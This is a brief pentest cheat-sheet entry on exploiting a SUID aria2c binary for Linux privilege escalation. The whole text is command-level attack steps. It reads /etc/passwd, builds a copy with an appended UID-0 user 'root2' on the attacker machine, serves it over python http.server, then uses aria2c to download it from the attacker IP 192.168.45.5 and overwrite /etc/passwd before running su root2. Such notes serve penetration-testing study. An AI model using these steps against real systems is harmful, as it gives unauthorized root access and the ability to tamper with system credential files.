aria2c SUID

on victim, cat /etc/passwd
- also aria2c can be used if /etc/passwd is restricted ./aria2c -i /etc/passwd
on attacker , nano newpasswd , paste all content of /etc/passwd
on victim, Generate password hash openssl passwd evil123
echo "root2:<passwd-hash>:0:0:root:/root:/bin/bash" >> newpasswd
python3 -m http.server 80
on victim,
- cd /etc
- ./aria2c -o passwd "http://192.168.45.5/newpasswd" --allow-overwrite=true
- su root2

Last updated 1 year ago